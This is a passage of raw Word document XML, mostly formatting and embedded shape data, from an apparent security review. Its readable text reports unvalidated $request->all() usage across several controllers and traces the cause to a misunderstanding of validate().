        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The application never objected</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, so that protection was incidental, not designed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A2CC52"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59968" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24D9E6FF" wp14:editId="567F9DA7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>580132</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19123</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="923925" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26235" name="Group 26235"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="923925" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="923925" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1160" name="Shape 1160"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="923925" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="923925" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="914400" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="917030" y="0"/>
                                  <a:pt x="919275" y="924"/>
                                  <a:pt x="921135" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="922995" y="4645"/>
                                  <a:pt x="923925" y="6890"/>
                                  <a:pt x="923925" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="923925" y="135979"/>
                                  <a:pt x="922995" y="138224"/>
                                  <a:pt x="921135" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="919275" y="141945"/>
                                  <a:pt x="917030" y="142875"/>
                                  <a:pt x="914400" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>
                                  <a:pt x="930" y="4645"/>
                                  <a:pt x="2790" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="924"/>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E88E733" id="Group 26235" o:spid="_x0000_s1026" style="position:absolute;margin-left:45.7pt;margin-top:-1.5pt;width:72.75pt;height:11.25pt;z-index:-251456512" coordsize="9239,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u8RwMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVt1umzAUvp+0d0DcrwRCfoiaVNq69mba&#10;qrV7AMcxAclgZDsh3dPv+BibELZObXNBbJ8fn/Odz8e+vjlVPDgyqUpRr8P4ahIGrKZiV9b7dfjr&#10;6e7TMgyUJvWOcFGzdfjMVHiz+fjhum1WLBGF4DsmA3BSq1XbrMNC62YVRYoWrCLqSjSsBmEuZEU0&#10;TOU+2knSgveKR8lkMo9aIXeNFJQpBau3Vhhu0H+eM6p/5LliOuDrEGLT+JX43ZpvtLkmq70kTVHS&#10;LgzyhigqUtawqXd1SzQJDrIcuapKKoUSub6ioopEnpeUYQ6QTTy5yOZeikODuexX7b7xMAG0Fzi9&#10;2S39fryXzWPzIAGJttkDFjgzuZxyWZl/iDI4IWTPHjJ20gGFxSyZZsksDCiI4jRZLmYWUloA7iMr&#10;Wnx90S5ym0aDUNoGyKH6/NX78n8sSMMQVrWC/B9kUO4g+ngOBKlJBSxFjQBXEBbU8yCplQK83oeQ&#10;z5Ss6EHpeyYQanL8prTl5M6NSOFG9FS7oQRmv8jphmhjZ6I0w6Dta1X4UhlpJY7sSaCeNgXLZqae&#10;rtIQZ6/A64FinKYTgOxM1SnQw7akn9nvofpiMj1Th7jsfnGWAGuMmyxJLXs6SRLHUytJFksUQThD&#10;38OZs0uyzNql87QjpBNZusJm82XWHf+RCCGAKox2c/mNLOLpdDpDd2DjtP4emw8AcssW2TBhH3g8&#10;XSb/RCMG3F+DR49wnMbZBSKxL8v5+e0y7EvcC/+HiuPPwOIlTKAStlq9hSNHOgdUDTXGgScLqJ8V&#10;vQ6NjoRjhDt3o7K49bMSD0vrkrOgWfUzDjnx0OhcecTFLsZL+vqcX3UePIgX58vjPjwHrn6OzsOw&#10;KReK2bNh+goeEt9rkBp9N+O1aTuAByVwteecaLwjq1LDnc/LCsqaLCbQQ6w/XoM30+tte8WRfubM&#10;9CZe/2Q59Gm8h8yCkvvtFy6DIzE3O/7QOeFNQbrVzm+niqGiH2Ofl5x7lzGaDlx+vb1L7uadh07Z&#10;2DF8VHjLibWkXTT2ZQH3MyTt3hcAijfCnUWtvX0NryLc5CxbM9yK3TPeyQgIXH4IDT4DMI/uyWLe&#10;Gedz1OofVps/AAAA//8DAFBLAwQUAAYACAAAACEAAD5Wmt8AAAAIAQAADwAAAGRycy9kb3ducmV2&#10;LnhtbEyPQUvDQBCF74L/YRnBW7tJY4uJ2ZRS1FMRbAXxts1Ok9DsbMhuk/TfO57scXgfb76Xryfb&#10;igF73zhSEM8jEEilMw1VCr4Ob7NnED5oMrp1hAqu6GFd3N/lOjNupE8c9qESXEI+0wrqELpMSl/W&#10;aLWfuw6Js5PrrQ589pU0vR653LZyEUUraXVD/KHWHW5rLM/7i1XwPupxk8Svw+582l5/DsuP712M&#10;Sj0+TJsXEAGn8A/Dnz6rQ8FOR3ch40WrII2fmFQwS3gS54tklYI4MpguQRa5vB1Q/AIAAP//AwBQ&#10;SwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlw&#10;ZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVs&#10;cy8ucmVsc1BLAQItABQABgAIAAAAIQCoLyu8RwMAAKAJAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMv&#10;ZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAAPlaa3wAAAAgBAAAPAAAAAAAAAAAAAAAAAKEFAABk&#10;cnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAArQYAAAAA&#10;">
                <v:shape id="Shape 1160" o:spid="_x0000_s1027" style="position:absolute;width:9239;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9239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nxxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8Mw&#10;DIXvg/0Ho0EvY7VbRhlZnTAGhexU2vXQoxarSWgsh9hL0/766jDYTeI9vfdpXUy+UyMNsQ1sYTE3&#10;oIir4FquLRy+Ny9voGJCdtgFJgtXilDkjw9rzFy48I7GfaqVhHDM0EKTUp9pHauGPMZ56IlFO4XB&#10;Y5J1qLUb8CLhvtNLY1baY8vS0GBPnw1V5/2vt3AOX6V5Pbqfbhs2cXy+bWNpTtbOnqaPd1CJpvRv&#10;/rsuneAvVsIv38gIOr8DAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEASzep8cYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l914400,v2630,,4875,924,6735,2784c922995,4645,923925,6890,923925,9525r,123825c923925,135979,922995,138224,921135,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6890,930,4645,2790,2784,4650,924,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,923925,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The same </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$request-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>all(</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pattern with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no validation at all</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> appeared in four more controllers, each exposing its own business key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A85519C"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0992" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78CFE169" wp14:editId="5A077FDD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2847081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18858</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="638175" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26236" name="Group 26236"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="638175" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="638175" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1168" name="Shape 1168"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633526" y="930"/>
                                  <a:pt x="635385" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4645"/>
                                  <a:pt x="638175" y="6896"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126454"/>
                                  <a:pt x="637245" y="128693"/>
                                  <a:pt x="635385" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633526" y="132414"/>
                                  <a:pt x="631280" y="133344"/>
                                  <a:pt x="628650"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B58FA17" id="Group 26236" o:spid="_x0000_s1026" style="position:absolute;margin-left:224.2pt;margin-top:-1.5pt;width:50.25pt;height:10.5pt;z-index:-251455488" coordsize="6381,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1ISgMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N9psWTZiB2izXIo2&#10;aNIPoCnKEkCJAklv/foORyJtWWnQJDk4FGfhe2+Gy/XNoebejklViWbpR1eh77GGirxqNkv/9/P9&#10;l8z3lCZNTrho2NI/MuXfrD5/ut63CxaLUvCcSQ+SNGqxb5d+qXW7CAJFS1YTdSVa1oCxELImGj7l&#10;Jsgl2UP2mgdxGKbBXsi8lYIypWD2tjP6K8xfFIzqn0WhmPb40gdsGn8l/q7Nb7C6JouNJG1Z0R4G&#10;eQeKmlQNLOpS3RJNvK2sRqnqikqhRKGvqKgDURQVZcgB2EThBZsHKbYtctks9pvWyQTSXuj07rT0&#10;x+5Btk/towQl9u0GtMAvw+VQyNr8B5TeASU7OsnYQXsUJtMki2ZT36NgipIkmfaS0hJ0H0XR8u7V&#10;uMAuGgyg7FtoDnXirz7G/6kkLUNZ1QL4P0qvygF9lEKvNqSGLkUPD2dQFvRzIqmFAr0+ppBjShZ0&#10;q/QDEyg12X1XuuvJ3I5IaUf00NihhM5+tadbok2cQWmG3v5Uq9KVylhrsWPPAv20Kdh8GkM9baUB&#10;58mBN+eOaZylUO5zV+tAt+uKfmV/Bu5JFGdn7oAL10uhaeIU08yTvnusZZpkHZZ4lk3MXgU4w9zD&#10;Lxs3iydd3CSFAeppTV27Ar00m6f/MKEEL61m+Y2SRXGSgWxdjPV6GZsDEMUADlmdpHDAQat0ngzx&#10;OTWiJJxO0fifejiFoySeRBdrurKY/TsZGk8lPm3u0ZqWb6eK659BhPV5UZNs3lVrDGBiO2wMPJ7N&#10;u256oxqmyUzPjhW285dlsfNnJR7SsOQ6ATr3sx6y5mHQufNlL1qMl+3rOL9pPzgRL/eX1X2w61z9&#10;cHZUbMqFYl2fm3MFt6Q7a9D7dJrxxhw7oAclcLUXnGi8I+tKw53Pq9oUYRaGdiHeQDZz1nfHK470&#10;kTNzNvHmFyvgnMZ7yEwouVl/49LbEXOz4x8mJ7wtST/b78feFaFiHhNfVJy7lBGGDlLe3d7H93hA&#10;AKne2cQxfFS4yLCLpD2a7mUB9zOQtu8LiHdBuLJotItv4FWEMM/YmuFa5Ee8k1EQuPxQGnwGII/+&#10;yWLeGeff6HV6WK3+AgAA//8DAFBLAwQUAAYACAAAACEAuCQoHuAAAAAJAQAADwAAAGRycy9kb3du&#10;cmV2LnhtbEyPQUvDQBCF74L/YRnBW7uJTSWN2ZRS1FMRbAXpbZudJqHZ2ZDdJum/dzzpcZiP976X&#10;ryfbigF73zhSEM8jEEilMw1VCr4Ob7MUhA+ajG4doYIbelgX93e5zowb6ROHfagEh5DPtII6hC6T&#10;0pc1Wu3nrkPi39n1Vgc++0qaXo8cblv5FEXP0uqGuKHWHW5rLC/7q1XwPupxs4hfh93lvL0dD8uP&#10;712MSj0+TJsXEAGn8AfDrz6rQ8FOJ3cl40WrIEnShFEFswVvYmCZpCsQJybTCGSRy/8Lih8AAAD/&#10;/wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50&#10;X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAA&#10;X3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAj0CtSEoDAACgCQAADgAAAAAAAAAAAAAAAAAuAgAA&#10;ZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAuCQoHuAAAAAJAQAADwAAAAAAAAAAAAAAAACk&#10;BQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAALEGAAAAAA==&#10;">
                <v:shape id="Shape 1168" o:spid="_x0000_s1027" style="position:absolute;width:6381;height:1333;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wxlxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;EMXvhX6HMEJvNauIyGoUESxeCtY/93EzbhY3kyWJuv32nYPQ2wzvzXu/Wax636oHxdQENjAaFqCI&#10;q2Abrg2cjtvPGaiUkS22gcnALyVYLd/fFlja8OQfehxyrSSEU4kGXM5dqXWqHHlMw9ARi3YN0WOW&#10;NdbaRnxKuG/1uCim2mPD0uCwo42j6na4ewPF7utiaXueHNeTFN1sHO7f+2DMx6Bfz0Fl6vO/+XW9&#10;s4I/mgqufCMj6OUfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALYXDGXEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l628650,v2630,,4876,930,6735,2784c637245,4645,638175,6896,638175,9525r,114300c638175,126454,637245,128693,635385,130553v-1859,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Root cause.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A widespread misunderstanding of what </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>validate(</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does. It is a genuinely confusing API: it looks like a filter and behaves like an assertion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7798B61E" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">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Two independent layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388FA50B" w14:textId="51058968" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="36"/>
        <w:ind w:right="16" w:hanging="208"/>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2016" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6CC131E6" wp14:editId="4AA444FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2161282</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18825</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="581025" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26237" name="Group 26237"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="581025" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="581025" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1177" name="Shape 1177"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4645"/>
                                  <a:pt x="581025" y="6896"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135973"/>
                                  <a:pt x="580095" y="138218"/>
                                  <a:pt x="578235" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141939"/>
                                  <a:pt x="574130" y="142869"/>
                                  <a:pt x="571500" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138218"/>
                                  <a:pt x="0" y="135973"/>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1F4C57F" id="Group 26237" o:spid="_x0000_s1026" style="position:absolute;margin-left:170.2pt;margin-top:-1.5pt;width:45.75pt;height:11.25pt;z-index:-251454464" coordsize="581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&#10;">
